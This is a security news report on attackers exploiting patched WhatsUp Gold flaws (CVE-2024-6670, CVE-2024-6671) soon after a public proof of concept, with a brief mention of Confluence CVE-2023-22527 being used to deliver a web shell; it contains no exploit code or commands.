Attackers are likely using publicly available proof-of-concept (PoC) exploits for recently discovered security flaws in Progress Software’s WhatsUp Gold to conduct opportunistic attacks.
Activity is said to have started on August 30, 2024, just five hours after the PoC was released for CVE-2024-6670 (CVSS Score: 9.8) by security researcher Sina Heirkham of the challenge team, who is also credited with the discovery and reporting CVE-2024-6671 (CVSS scores: 9.8).
Both critical vulnerabilities, which allow an unauthenticated attacker to obtain an encrypted user password, were patched up by Progress in mid-August 2024.
“The chronology of events suggests that despite the availability of fixes, some organizations failed to apply them quickly, leading to incidents almost immediately after the PoC was published,” Trend Micro researchers Hitomi Kimura and Maria Emrin Virei said in Thursday’s analysis.
Attacks observed by the cybersecurity firm include bypassing WhatsUp Gold authentication to use a PowerShell Active Monitor script and ultimately loading various remote access tools to gain access to a Windows host.
This includes Atera Agent, Radmin, SimpleHelp Remote Access, and Splashtop Remote, with both Atera Agent and Splashtop Remote installed using a single MSI installer file obtained from the remote server.
“The polling process NmPoller.exe, a WhatsUp Gold executable, appears to be capable of hosting a script named Active Monitor PowerShell Script as a legitimate function,” the researchers explained. “The threat actors in this case chose it to run for remote arbitrary code execution.”
Although no further exploits were detected, the use of multiple remote access programs indicates the involvement of a ransomware actor.
This is the second time that security vulnerabilities in WhatsUp Gold have been actively used as a weapon. At the beginning of last month, the Shadowserver Foundation said it observed attempts to exploit CVE-2024-4885 (CVSS score: 9.8), another critical bug that was resolved by Progress in June 2024.
The disclosure comes weeks after Trend Micro also discovered that threat actors were exploiting a patched security flaw in Atlassian Confluence Data Center and Confluence Server (CVE-2023-22527CVSS score: 10.0) for delivering Godzilla’s web shell.
“The CVE-2023-22527 vulnerability continues to be widely exploited by a wide range of threat actors who are abusing this vulnerability to perform malicious activities, making it a significant security risk for organizations worldwide,” the company said in a statement. said.
